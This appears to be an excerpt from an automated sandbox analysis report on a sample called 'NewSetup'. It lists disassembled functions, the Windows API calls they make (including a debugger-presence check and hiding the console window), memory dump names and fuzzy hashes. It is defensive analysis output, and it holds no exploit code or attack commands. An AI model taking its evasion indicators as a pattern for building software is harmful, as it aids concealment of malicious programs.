                                                                                                      • Instruction ID: eb532e572796b3f3e39991f8e5986cb4468f3245fd936298fc6b416a62fe4f8c
                                                                                                      • Opcode Fuzzy Hash: 47623733fa7ee54ee4fdf86bb6e208f8f51ec27f6a21ac6655cceb4ffd88667f
                                                                                                      • Instruction Fuzzy Hash: 9471B0B2C10219DBCB10DFA4DC487EEBBF5BF59310F140629F814A7391E73599A98BA1
                                                                                                      Function 00229CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                      • Instruction ID: 3facbbe92dc0a9d2c90f907b5c31563bd54093f51d58ff8732c4bf3485a0c294
                                                                                                      • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                      • Instruction Fuzzy Hash: C6025C71E1022AABDF14CFA8D9807AEF7B5FF48314F24826AD519E7341D731AA51CB90
                                                                                                      Function 00231FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002320D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974802433-0
                                                                                                      • Opcode ID: 3cae16eb0c087a59e49f766ac398d9c65aa5d983da66197a4e1bc0309976b24c
                                                                                                      • Instruction ID: b8b0a968a795184fe3148dd8b43108f981ff209820518f5900058d2e2a35ee7f
                                                                                                      • Opcode Fuzzy Hash: 3cae16eb0c087a59e49f766ac398d9c65aa5d983da66197a4e1bc0309976b24c
                                                                                                      • Instruction Fuzzy Hash: 9B7106F192516AAFDF259F38DC8DAFAB7B9AB05300F1441D9E548A3211DB318E99CF10
                                                                                                      Function 0021F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0021F8F5
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0021F9C1
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0021F9DA
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0021F9E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 610ac620df78359d5bc2e7c895bee6cac9fa160d7ce336519302b15cc80a53c5
                                                                                                      • Instruction ID: 09cf83fd3a340b85b75645ac4b44f10f89b445856811cb8c842bc576a7c036eb
                                                                                                      • Opcode Fuzzy Hash: 610ac620df78359d5bc2e7c895bee6cac9fa160d7ce336519302b15cc80a53c5
                                                                                                      • Instruction Fuzzy Hash: DC31F9B5D11219EBDF61EFA4D9497CDBBF8AF18300F1041AAE40CAB250EB719A84CF45
                                                                                                      Function 0023AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 127012223-0
                                                                                                      • Opcode ID: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
                                                                                                      • Instruction ID: 7a5cefb00a04c6fd042b37d37fa4525399ef89b1fee7b6926023e32c171cd005
                                                                                                      • Opcode Fuzzy Hash: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
                                                                                                      • Instruction Fuzzy Hash: DE71E7B2A2020A6BDF219E648C41FEFB7BADF55314F290466F884A7191E775CC60CB52
                                                                                                      Function 0021FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0021FE70
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021FE9C
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0021FEDB
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FEF8
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0021FF37
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021FF54
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0021FF96
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0021FFB9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2040435927-0
                                                                                                      • Opcode ID: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
                                                                                                      • Instruction ID: fa9bf74597e8a0d97f2f4ec13a97494f83cdabb9b4c2c301b2e3505502742382
                                                                                                      • Opcode Fuzzy Hash: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
                                                                                                      • Instruction Fuzzy Hash: E251A07262021AAFEB604F60CD49FEA7BE8EF62750F154435F924DA590D7B18CA18B50
                                                                                                      Function 0022EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                      • Instruction ID: 9500c5a6f05806044f6abd7b3a729b789b69422ca0e892039e2977a19dc507d9
                                                                                                      • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                      • Instruction Fuzzy Hash: 2FB13772A20366BFDF218FA4DD41BAE7BB5EF15310F154175E844AF282D2749D21CBA0
                                                                                                      Function 00220D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220D77
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00220D7F
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220E08
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00220E33
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220E88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: e076595a65aaf0bf318da848514dd798f96f4dde23e10e2ec15e47102a81cc20
                                                                                                      • Instruction ID: 4d3318316a1b0e04de3c09c4cd12206ca94ada09b2067e026e4591d499587d5d
                                                                                                      • Opcode Fuzzy Hash: e076595a65aaf0bf318da848514dd798f96f4dde23e10e2ec15e47102a81cc20
                                                                                                      • Instruction Fuzzy Hash: 4B41F230A20229BBCF11DFA8E884A9EBBA6EF05314F158455E8146B393C731AD61CF90
                                                                                                      Function 00213C70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213CA5
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213CBF
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00213CE0
                                                                                                      • __Getctype.LIBCPMT ref: 00213D92
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00213DD8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                      • String ID: e.$
                                                                                                      • API String ID: 3087743877-2253995300
                                                                                                      • Opcode ID: 416dd5b16cf2bb9bc6c7cd15da4515f391681d939163b193c231bb021d65625c
                                                                                                      • Instruction ID: a2441f7eac25f9c8aac96be948cad35375c2aefc916c44f6c766b37f380f2123
                                                                                                      • Opcode Fuzzy Hash: 416dd5b16cf2bb9bc6c7cd15da4515f391681d939163b193c231bb021d65625c
                                                                                                      • Instruction Fuzzy Hash: 9D4177B5E112158BCB10DF98E844BEABBF2BFA4720F148119D8156B391DB35AA90CF91
                                                                                                      Function 002124B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetConsoleWindow.KERNEL32 ref: 002124DD
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 002124E6
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00212524
                                                                                                        • Part of subcall function 0021F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                        • Part of subcall function 0021F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                        • Part of subcall function 0021F11D: CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212567
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212578
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212589
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0021259A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3956949563-0
                                                                                                      • Opcode ID: 619efaeb86420f7f58becf9a7e0f5f9bd9f72a2d21dfd228edf1d2f3c913ea32
                                                                                                      • Instruction ID: dac1beaca46dac0bb3313fe4ff1ee6f11dd78dce4d06aaa2fc5cf25f8b1415c0
                                                                                                      • Opcode Fuzzy Hash: 619efaeb86420f7f58becf9a7e0f5f9bd9f72a2d21dfd228edf1d2f3c913ea32
                                                                                                      • Instruction Fuzzy Hash: D221E6F2D50215ABDF10AF94DC46BDE7AF8AF14700F080165F50876281E7B695B4CBE2
                                                                                                      Function 0022CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,0022D01A,00211170,0021AA08,?,?), ref: 0022CFCC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3664257935-537541572
                                                                                                      • Opcode ID: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
                                                                                                      • Instruction ID: 565aefc227ced5ad5257567fe2b2c933cfdc61f65f9d5bc2f76fcf075f646e00
                                                                                                      • Opcode Fuzzy Hash: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
                                                                                                      • Instruction Fuzzy Hash: 3D21F635A21322BBC7318FA5FD48A5E7759AB46360F350113FD06A7690D770ED20CAD0
                                                                                                      Function 00220080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00220086
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00220094
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002200A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                      • API String ID: 667068680-1047828073
                                                                                                      • Opcode ID: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
                                                                                                      • Instruction ID: 8fceee0cfdaf3c1705b08051bc96e4c1af7491eeadb142179e3f2bac567e779e
                                                                                                      • Opcode Fuzzy Hash: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
                                                                                                      • Instruction Fuzzy Hash: 0AD0C979562620AB8354AFF8FC4D98A3EB9FA0B7123024553F841D2360DFB486108B9A
                                                                                                      Function 00234F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2445ab7ba260ff43b9c1b356cadcd309c12400249bf2b6f03e9b2a270239f5d1
                                                                                                      • Instruction ID: 13da66b86169384ea0065df5e7e8fdfdd5df5775139059c1dc43f2106f920927
                                                                                                      • Opcode Fuzzy Hash: 2445ab7ba260ff43b9c1b356cadcd309c12400249bf2b6f03e9b2a270239f5d1
                                                                                                      • Instruction Fuzzy Hash: 60B13AF4E28666AFDB01CFA8D885BBE7BB4BF06300F144199E90957291C7719D61CF90
                                                                                                      Function 00219B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219C97
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CA8
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CBC
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CDD
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CEE
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219D06
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 2134207285-0
                                                                                                      • Opcode ID: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
                                                                                                      • Instruction ID: ec26ff9712bb04ebf6b99e97dee21df0dc24517e60e02aec0373de0a92863111
                                                                                                      • Opcode Fuzzy Hash: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
                                                                                                      • Instruction Fuzzy Hash: 8A41C2B1910745CBDB309F6089117EFB7F4AF69324F18062ED9BA162D1D37165E0CB92
                                                                                                      Function 0022ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,0022ACDE,00220760,0021B77F,BB40E64E,?,?,?,?,0023BFCA,000000FF), ref: 0022ACF5
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022AD03
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022AD1C
                                                                                                      • SetLastError.KERNEL32(00000000,?,0022ACDE,00220760,0021B77F,BB40E64E,?,?,?,?,0023BFCA,000000FF), ref: 0022AD6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: a6b8d64a5d5d88429e74dc09b242e3c500ddac32d8403584f3f71a03a5172e0b
